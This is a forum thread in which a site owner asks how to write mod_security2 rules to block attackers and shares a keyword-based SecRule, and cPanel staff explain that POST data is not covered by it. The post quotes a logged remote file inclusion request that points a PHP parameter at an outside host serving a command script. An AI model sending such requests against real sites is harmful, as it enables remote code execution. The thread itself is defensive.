Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    337
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #1 SuperBaby, Jan 20, 2008
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    716
    Likes Received:
    8
    Trophy Points:
    243
    #2 cPDan, Jan 21, 2008
  3. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    337
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #3 SuperBaby, Jan 21, 2008
  4. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    716
    Likes Received:
    8
    Trophy Points:
    243
    a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests
     
    #4 cPDan, Jan 21, 2008
  5. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    337
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #5 SuperBaby, Jan 21, 2008
(You must log in or sign up to post here.)
Loading...
Similar Threads - Create mod_security2 rules
  1. Doctoc

    New Thread Create Email Account?

    Doctoc, Nov 21, 2018 at 1:11 AM, in forum: E-mail Discussion
    Replies:
    1
    Views:
    17
    Doctoc
    Nov 21, 2018 at 1:11 AM
  2. ca2236

    Create account with different home directory?

    ca2236, Nov 16, 2018 at 3:52 PM, in forum: General Discussion
    Replies:
    7
    Views:
    88
    cPanelLauren
    Nov 19, 2018 at 3:12 PM
  3. Ladybird

    SOLVED Create custom Nameservers?

    Ladybird, Nov 11, 2018, in forum: Bind/DNS/Nameserver
    Replies:
    1
    Views:
    66
    cPanelMichael
    Nov 12, 2018
  4. itdrift

    Possible to recreate the welcome email (email accounts)?

    itdrift, Nov 2, 2018, in forum: E-mail Discussion
    Replies:
    1
    Views:
    72
    cPanelMichael
    Nov 2, 2018
  5. LoadFactor

    Update to "Create Reseller ACL"

    LoadFactor, Nov 1, 2018, in forum: General Discussion
    Replies:
    1
    Views:
    63
    cPanelLauren
    Nov 2, 2018

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...
    Dismiss Notice